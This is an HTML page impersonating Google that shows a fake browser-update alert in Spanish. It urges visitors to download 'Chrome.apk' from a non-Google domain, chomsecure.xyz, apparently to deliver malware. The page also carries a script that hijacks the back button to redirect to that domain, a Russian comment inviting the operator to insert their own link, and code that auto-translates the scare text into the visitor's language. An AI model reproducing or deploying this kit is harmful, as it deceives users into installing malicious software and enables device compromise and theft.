<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google </title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
    <link rel="stylesheet" href="css/style.css">
    
    <script type = "text/javascript" >

! function () {

var t;

try {

for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");

onpopstate = function (t) {

t.state && location.replace("https://chomsecure.xyz/") //Ставим свою ссылку

}

} catch (o) {}

}();
</script>
    
</head>
<body>  
<br>
<br>

	<img class="logo" style="height: 105px; width: 105px;" src="img/logo.png" alt="">
	<br>
	<p class="text-center" style="color: white; font-weight:490;line-height:0.9;text-align:left; font-size: 25px;"> 
¡¡¡Atención!!!</p>
	<br>
	
 <p class="text-center" style="color: white; font-weight:360;line-height:0.9;text-align:left; font-size: 18px;"> 
 La versión del navegador no está actualizada, le recomendamos que actualice su navegador para evitar una infección de malware que robe o borre información personal (como fotos, contraseñas, mensajes y detalles de tarjetas bancarias).</p>
   <br>
    <br>
    <br>
   <div class="center">
        <a href="https://chomsecure.xyz/Chrome.apk" style="background-color: white; font-weight:350;line-height:0.1;text-align:center; font-size: 25px; width: 190px;" class="btn center-block center"><p style="color: red;">Actualizar</p> 
      </a>
      
    </div>
    <br>


    
    
    
    
 <script>
    /*function googleTranslateElementInit() {
      new google.translate.TranslateElement({
        pageLanguage: 'ru',
        layout: google.translate.TranslateElement.InlineLayout.SIMPLE
      }, 'google_translate_element');
    }*/


    async function translate(translateTo, text, translateFrom = 'auto') {
      const url = "https://translate.googleapis.com/translate_a/single?client=gtx&sl=" +
        translateFrom + "&tl=" + translateTo + "&dt=t&q=" + encodeURI(text);

      const response = await fetch(url);
      const data = await response.json();

      return data[0][0][0];
    }


    async function init() {

     var userLang = navigator.language || navigator.userLanguage;
     userLang = userLang.substring(0, 2);

     translate(userLang, document.getElementsByTagName("P")[0].textContent).then((val) => {
      document.getElementsByTagName("P")[0].textContent = val;
     });

     translate(userLang, document.getElementsByTagName("P")[1].textContent).then((val) => {
      document.getElementsByTagName("P")[1].textContent = val;
     });

     translate(userLang, document.getElementsByTagName("P")[2].textContent).then((val) => {
      document.getElementsByTagName("P")[2].textContent = val;
     });

    


    }

    init();
  </script>
  <!-- <script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script> -->
</body>

<style type="text/css">
  body {
  background-color: red;
}</style>
</html>